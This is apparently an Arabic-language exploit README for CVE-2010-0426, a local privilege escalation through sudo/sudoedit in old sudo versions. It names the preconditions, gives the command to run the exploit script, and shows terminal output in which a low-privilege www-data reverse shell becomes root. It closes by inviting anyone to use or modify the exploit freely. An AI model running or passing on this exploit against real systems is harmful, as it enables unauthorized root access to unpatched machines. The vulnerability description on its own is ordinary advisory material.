
sudo 1.6.x قبل 1.6.9p21 و 1.7.x قبل 1.7.2p4 - تصعيد الامتيازات باستخدام sudo و sudoedit
https://www.cvedetails.com/cve/CVE-2010-0426/
إصدارات sudo 1.6.x قبل 1.6.9p21 و 1.7.x قبل 1.7.2p4، عندما يكون الأمر الزائف ممكّنًا، تسمح بمطابقة بين اسم الأمر الزائف واسم ملف تنفيذي في أي دليل، مما يسمح للمستخدمين المحليين برفع الامتيازات عبر ملف تنفيذي مُعدل، كما هو موضح بملف باسم sudoedit في دليل المستخدم الرئيسي.
رفع الامتيازات عندما يكون للثنائي sudoedit صلاحية SUID ويمكن تحرير ملف كـ sudo (تحقق باستخدام sudo -l)
./exploit.sh
رفع الامتيازات إلى الجذر من شل عكسي منخفض الامتيازات
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
لا تتردد في الاستخدام أو التعديل متى وأينما تشاء